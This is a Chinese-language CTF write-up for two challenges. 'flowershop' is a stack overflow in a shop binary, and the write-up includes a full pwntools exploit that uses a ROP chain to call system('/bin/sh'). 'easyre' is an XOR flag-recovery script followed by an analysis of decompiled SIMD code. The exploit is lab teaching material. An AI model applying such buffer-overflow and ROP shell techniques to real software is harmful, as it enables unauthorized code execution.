flowershop
如图所示,v8是钱的数量,strncpy从src复制三个字符给dest的数组里,最后一个元素是0,相当于字符串截断,strcmp是比较c和dest中的内容,如果相等就不会exit(0);双击c进去看,c是字符串“pwn”,所以我们在read溢出的时候,把src覆盖成”pwn/x00”就可以绕过检测,后面的v8就可以随便覆盖八字节,充值任意的钱数。
接下里我们再进行购物,可见shop传入的v5有三个元素,我们再进shop函数看看:
通过分析就可以看到,这三个元素对应了每个商品购买的数量,每次买一个商品,对应的元素就会加1,每件商品最多买8个
此时末位有个read,很可能就是我们要溢出的漏洞,但是参数v4可控未知,所以往前可看check函数做了什么,显然通过分析这就是满足买了两件a商品和1件b商品的时候就可以给a2指针赋值为70,指向的就是v4,这样shop函数的buf只有10字节,但是read可以输入70字节,就达到了溢出攻击条件
所以最后我们通过购买c商品,达到给magic赋值”/bin/sh”的目的,所以条件已达成,
值得注意的是最后赋值钱的时候八字节的最高位不能是1,因为这是符号位,如果是1就是复数了,最后read也不一定要追加到70个字节,能溢出执行system即可了。
from pwn import *
#p=remote("8.147.134.241",24158)
p=process("./pwn")
system=0x400D7A
magic=0x601840
pop_rdi=0x400f13
ret=0x4006f6
payload=b'a'*52+b'pwn\x00'+b'\xff\xff\xff\x7f\xff'
p.send(payload)
p.recvuntil("你的选项:")
p.sendline("a")
p.recvuntil("商品序号:\n")
p.sendline("a")
p.sendline("1")
p.recvuntil("商品序号:\n")
p.sendline("a")
p.sendline("1")
p.recvuntil("商品序号:\n")
p.sendline("b")
p.sendline("1")
p.recvuntil("商品序号:\n")
p.sendline("c")
payload=(b'a'*24+p64(pop_rdi)+p64(magic)+p64(system))
p.recvuntil('1/0')
p.sendline(payload)
p.interactive()
ps:我用的是IDA8.3free版本
easyre
flag=[0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03,
0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02,
0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57,
0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04,
0x4A, 0x77]
for i in range(len(flag)-1,-1,-1):
flag [i]^= flag [(i+1)%len(flag)]
print(bytes(flag))
分析算法异或运算,提取数据
这段代码使用了C语言和汇编语言的混合语法,通常用于底层编程,比如逆向工程或者对性能要求很高的应用。这段代码可能来自一个编译后的二进制文件,并且很可能是针对x86-64架构的,因为它使用了诸如_mm_movemask_epi8等内联汇编的SSE指令。
代码分析:
- 函数签名:
o __fastcall:这是一个调用约定,它将前两个参数放在寄存器中(RCX, RDX),而不是在堆栈上。
o main:这是程序的入口点,不过这里被修改为__fastcall调用方式。
o argc、argv、envp:这是标准的main函数参数,分别表示参数数量、参数值以及环境指针。 - 变量:
o v3:一个指向__m128i类型的指针,这是一种128位的SIMD寄存器数据类型,通常用于SSE(流式SIMD扩展)。
o v4、i、v6:64位整数变量,用于循环和其他操作。 - 逻辑流程:
o 如果命令行参数的数量小于等于1,程序将退出(argc <= 1)。
o v3被初始化为指向第一个命令行参数(argv[1]),接下来程序准备进行一些SIMD操作。
o 一个循环运行43次,每次通过异或(XOR)操作对__m128i寄存器v3中的每个字节进行处理,这看起来像是一种混淆或加密操作。
o 循环结束后,程序使用SIMD指令(_mm_cmpeq_epi8和_mm_and_si128)进行比较,将v3的内容与特定内存位置(xmmword_140021410和xmmword_140021400)的值进行比对。
o 如果比较成功,程序调用函数sub_1400011A0并将结果传递给另一个函数sub_1400015A0。
观察:
• 这段代码似乎是在检查输入(可能是命令行参数)是否与某个特定值相匹配,可能是用于验证密码或者在某种挑战中验证flag。
• SIMD指令的使用表明,该比较操作经过优化,能够一次性比较多个字节,提升性能。
• 虽然函数sub_1400011A0和sub_1400015A0的定义没有给出,但它们可能与验证过程有关,可能在输入匹配时显示某些信息。
复盘
全wp